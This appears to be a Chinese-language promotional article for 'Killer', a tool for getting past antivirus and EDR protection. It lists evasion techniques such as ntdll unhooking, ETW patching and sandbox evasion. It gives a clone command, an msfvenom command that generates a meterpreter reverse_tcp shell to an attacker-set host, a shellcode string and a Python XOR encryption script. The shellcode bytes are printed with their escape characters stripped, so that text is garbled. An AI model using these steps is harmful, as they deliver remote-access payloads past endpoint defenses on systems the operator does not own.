Killer是一款针对AV和EDR的绕过工具,在该工具的帮助下,广大研究人员可以通过绕过AV和EDR等安全检测工具,来测试目标安全防护产品的安全性能。
功能介绍
1、实现了针对内存扫描绕过的Module Stomping技术; 2、通过刷新ntdll副本解DLL钩子; 3、IAT隐藏和混淆&API解钩子; 4、实现了用于用于绕过某些安全控制的ETW补丁; 5、包含沙盒规避技术和基本反调试; 6、通过XOR实现完全代码混淆(函数-键-Shellcode); 7、Shellcode混淆、反混淆和加密; 8、在不使用API的情况下将Payload移动到内存中; 9、在不创建新线程的情况下运行,支持x64和x86架构;
工具下载
广大研究人员可以使用下列命令将该项目源码克隆至本地:
代码语言:javascript复制
git clone https://github.com/0xHossam/Killer.git工具使用
首先,使用msfvenom工具生成你自己的Shellcode:
代码语言:javascript复制msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST<IP> LPORT<PORT> -f py(向右滑动,查看更多)接下来,将输出结果拷贝到加密器XOR函数中:
代码语言:javascript复制data = b"xfcxe8x82x00x00x00x60x89xe5x31xc0x64x8bx50x30x8bx52x0cx8bx52x14x8bx72x28x0fxb7x4ax26x31xffxacx3cx61x7cx02x2cx20xc1xcfx0dx01xc7xe2xf2x52x57x8bx52x10x8bx4ax3cx8bx4cx11x78xe3x48x01xd1x51x8bx59x20x01xd3x8bx49x18xe3x3ax49x8bx34x8bx01xd6x31xffxacxc1xcfx0dx01xc7x38xe0x75xf6x03x7dxf8x3bx7dx24x75xe4x58x8bx58x24x01xd3x66x8bx0cx4bx8bx58x1cx01xd3x8bx04x8bx01xd0x89x44x24x24x5bx5bx61x59x5ax51xffxe0x5fx5fx5ax8bx12xebx8dx5dx6ax01x8dx85xb2x00x00x00x50x68x31x8bx6fx87xffxd5xbbxf0xb5xa2x56x68xa6x95xbdx9dxffxd5x3cx06x7cx0ax80xfbxe0x75x05xbbx47x13x72x6fx6ax00x53xffxd5x63x61x6cx63x2ex65x78x65x00"
key = 0x50 # Put here your key as byte like for example (0x90 or 0x40 or 0x30) and more...
print('{ ', end='')
for i in data:
print(hex(i ^ key), end=', ')
print("0x0 };") # Notice that it adds one byte "0x0" to the end.(向右滑动,查看更多)最后,你就可以处理你自己的解密函数了,工具运行后的结果如下所示:
检测结果
项目地址
Killer:https://github.com/0xHossam/Killer
